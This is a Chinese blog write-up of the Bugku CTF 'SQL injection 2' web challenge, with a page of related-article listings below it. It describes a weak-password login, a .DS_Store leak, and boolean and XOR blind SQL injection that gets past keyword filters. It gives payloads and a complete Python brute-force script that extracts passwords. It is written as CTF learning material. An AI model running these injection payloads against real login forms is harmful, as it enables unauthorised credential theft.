Bugku题解-Sql注入2(web)

最新推荐文章于 2024-04-15 01:58:25 发布
最新推荐文章于 2024-04-15 01:58:25 发布
阅读量393 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flying_bird2019/article/details/110698334
版权

sql注入2

题目不难,但是真的用了好长时间研究(主要原因是本地数据库和题目环境不太一样)这题真的是一言难尽。。不知道出题人nb还是sb。。。(我寻思这篇文章不能被他本人看到吧)
先来说一下非注入的解法

方法一

要拿到flag就得先用账户登录成功,flag并不在数据库里,我先尝试了用字典爆破admin密码,没想到竟然成功了???
后来发现竟然是弱口令!!!uname=admin passwd=admin123
(ps:果然,只要是人写出来代码就有可能存在安全漏洞,这种非预期解出题人直接原地去世。。。后面还有更离谱的解法。。

方法二

这个方法是看其他人题解,更离谱。。
网上大部分都是用.DS_Store泄露
.DS_Store是Mac OS保存文件夹的自定义属性的隐藏文件,如文件的图标位置或背景色,相当于Windows的desktop.ini
御剑扫一下目录得到这个文件,下载后在这个文件中可以看到这个文件夹下的文件目录,里面有个flag,直接访问url…/flag下载得到flag
离谱的是御剑直接也扫出来了flag文件。。。直接下载flag。。很无语。。这和sql注入有什么关系。。

方法三

写这个方法之前先吹一下信安带佬一叶飘零,这个方法是借鉴了另一篇博客,没想到他竟然是参考一叶飘零的题解,没想到学长这么牛批。。看过他的博客后直呼方方土,行!!!
言归正传

方法一

先对sql关键字进行fuzz,真的过滤了很多关键字

在这里插入图片描述
返回长度370均为过滤的字符,其中包括注释符等
减号没有过滤,可以用减号闭合(第一次知道)
在这里插入图片描述
可以利用这个-1和0判断查询是否成功
在这里插入图片描述
username=0可以查询到所有包含非数字的字符串、以及字符串“0”
username=-1为空
因此可以利用布尔注入爆破passwd字段
payload=" admin’-(ascii(mid((reverse(mid((passwd)from(第?位))))from(-1)))=‘ascii码’)-’ "
mid函数原型mid(string,start,length)
逗号被过滤mid(string from(start) for (length))
for也被过滤,用reverse()+from(-1)
在这里插入图片描述
爆破每一位passwd字段
当payload为假时,返回”username error!!“
为真时,返回”password error!!“

本地实现过程中遇到了坑,当条件为真时应该返回空,username=-1,可是我本地却返回了除了满足条件的那一行的其他行,而这道题的实验环境却返回的是空,可能是数据库版本问题??
脚本中会给出查询版本号payload

方法二

除此之外还可以用异或注入
先爆破passwd长度
payload=“ua’^(length(passwd)=” + str(长度) + “)^'ub”
直接给出脚本

import requests
url='http://123.206.87.240:8007/web2/login.php'
pd_len=1
passwd="123"
while(1):
    #uname="ua'^(length(passwd)=" + str(pd_len) + ")^'ub"
    uname="ua'^(length(version())=" + str(pd_len) + ")^'ub"
    #print(uname)
    payload_1={'uname':uname,'passwd':passwd}
    r=requests.post(url,data=payload_1)
    if 'username error!!'in r.text :
        break
    pd_len+=1
print("length:"+str(pd_len))
password=''
for i in range(1,pd_len+1):
    print('[*] No.%d' % i)
    for j in "0123456789abcdefghijklmnopqrstuvwxyz*&^%$#@!.-":
        #uname="admin'^(ascii(mid((reverse(mid((passwd)from(%d))))from(-1)))=%d)^'" %(i,ord(j))
        uname="admin'^(ascii(mid((reverse(mid((version())from(%d))))from(-1)))=%d)^'" %(i,ord(j))
        payload_2={'uname':uname,'passwd':passwd}
        r=requests.post(url,data=payload_2)
        if 'username error!!' in r.text :
            password+=j
            print('success')
            break
print(password)

在这里插入图片描述
版本号:
在这里插入图片描述
解密md5即可得到admin123
登陆后输入ls得到flag

本文借鉴了几篇博客
博客一
博客二
博客三

flying_bird2019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugku学习之43.sql注入2(只剩下from没过滤其余的全部过滤)
s11show_163的博客
03-05 287
考察: 逗号被过滤:substr(from for)或者mid(from for)截断 for被过滤:不使用for则mid(from)默认截断到字符串位 空格被过滤:不使用空格 admin字符串与另一个字符串比较时会被翻译成0或者空格 所以’admin’-’‘的意思是减去空字符串,所以值为0,更深远的’admin’-0-’‘先减去0再减去空字符串,值也为0,而’admin’-1-’'的值则为1。...
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3389
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
BugkuCTF web sql注入2
H4ppyD0g的博客
02-08 555
页面post方式提交表单; 所有按钮都不好用; f12检查看到action到login.php,访问一下,username和password都需要填写; 输入用户名直接提交提示用户名和密码都需要填写; 后台扫描没有结果; 经过一些列输入测试,判断admin就是用户名,但是密码不知道; 初步判断为post提交sql注入,'单引号验证一下 admin' -- # 判断应该就是这道题目就是考察的sql注...
bugku成绩单(sql注入)writeup_sql注入 bugku,2024年最新只有搞网络安全开发的才知道
最新发布
2401_83946402的博客
04-15 313
元数据是关于数据的数据,如数据名或表名,列的数据类型,或访问权限等。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
bugku ctf平台之sql注入1 write up
l3oog1e的博客
05-25 4470
题目链接  : http://103.238.227.13:10087/ //过滤sql $array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','orde
login1(SKCTF)(bugku
hhh
09-29 2079
  这周学长出了两道二次注入的题(再也不能直接用sqlmap水过去了……)第一道现在还没写出来QAQ,但是从第二道多少学习了一下手工注入的一些操作。   先是看了几篇讲解约束注入的博客,这个博主小姐姐超厉害,在这里就说一下自己的理解: 约束SQL注入的原理就是利用的约束条件,比如最长只能有15个字符的话,如果你输入的是abcdefghijklmnop(16位),那么保存在数据里的就是abcd...
2020年CSP-J2 CSP-S2 NOIP复赛题解-2021.08.20(C).pdf
08-20
CSP-J2 CSP-S2 NOIP 复赛题解 以下是从给定文件中生成的相关知识点: 一、CSP-J2 介绍 * CSP-J2 是 Nacional Olympiad in Informatics(NOIP)的其中一个分支,旨在选拔优秀的程序设计选手。 * CSP-J2 的考试内容...
2020年CSP-J2 CSP-S2 复赛题解-2021.09.19.pdf
09-19
2020年CSP-J2 CSP-S2 复赛题解-2021.09.19.pdf
JzxxOJ题解-2008011020080110.zip
02-26
JzxxOJ-20080110
2022美赛B题题解-水电共享赛题题解.zip
01-21
2022美赛b题 2022美赛B题题解_水电共享赛题题解
2020年CSP-J2 CSP-S2 复赛题解-2020.11.12.pdf
12-16
CSP-J2 CSP-S2 复赛题解 CSP-J2 CSP-S2 复赛题解是中国计算机学会(CCF)举办的全国计算机等级考试(CSP)中的高级级别考试,旨在考查考生的编程能力、算法设计能力和问题解决能力。该考试分为两个部分:CSP-J 和 ...
BugKu-SQL注入2
u013622866的博客
05-07 401
题目链接 戳我 简单尝试 首先当然是去试试万能密码了,emmmm,全被过滤了...... 试试弱口令呢? admin admin admin 123456 admin123 admin123 ... ... 然后,竟然还是弱口令.......(admin|admin123),但我岂能就这么放过它,嘿嘿,开始手注 题目给除了一些已经过滤的字符,通过尝试,发现并不...
bugku - login1(SKCTF)
多崎巡礼的博客
09-04 1523
关于sql的约束攻击资料可参考 https://blog.csdn.net/qq_42357070/article/details/82379183 本题可利用注册账户“admin                                       1”(admin后面空格超过预设的“n”个字符/varchar(n))即可 密码自定义 数据实际写入的是admin/密码 登陆即可...
bugkuctf–login4字节翻转攻击
超人学飞的日子
06-13 4260
题目地址:http://118.89.219.210:49168/字节翻转攻击原理:http://www.anquan.us/static/drops/tips-7828.htmlhttp://www.freebuf.com/articles/system/163756.html尝试登陆:普通用户无法查看,用户名改为admin,密码任意:admin又不允许登陆,并且密码是任意输入的,也就是说关键点...
BugkuCTF | WEB(题1---题10)
weixin_47982238的博客
07-13 499
WEB2 直接F12查看源码<!--flag KEY{Web-2-bugKssNNikls9100}--> 计算器 先按下F12 改掉最长长度,保证可以输出结果,输入计算结果后拿到flag:flag{CTF-bugku-0032} web基础$_GET $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 上述代码给出一个what变量(get请求),要求该变量等于flag 于是,在u.
CG CTF WEB SQL注入2
无限迭代中......
07-04 1457
http://4.chinalover.sinaapp.com/web6/index.php 题解: <html> <head> Secure Web Login II </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE...
Bugku web login2
qq_41696858的博客
07-26 505
今天中午忙着去吃饭,场景过时了,就没法录视频了,简单说一下吧: 前面都一样,通过sql注入过登录界面,先随便提交点啥,burp抓包,发现response有base64编码内容,解码发现是php代码 $sql="SELECT username,password FROM admin WHERE username='".$username."'"; if (!empty($row) && $row['password']===md5($password)){ } 由于没有限制行数,盲猜可以un
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2699
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
BugKuCTF(CTF-练习平台)——WEB-SQL注入1
Ifish的博客
03-10 1987
%00截断 http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,database()%23 http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,hash%20fro%00m%20sql3.key%23 KEY{c3d3c17b4ca7...
bugku ctf sqli-0x1题解
03-23
2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值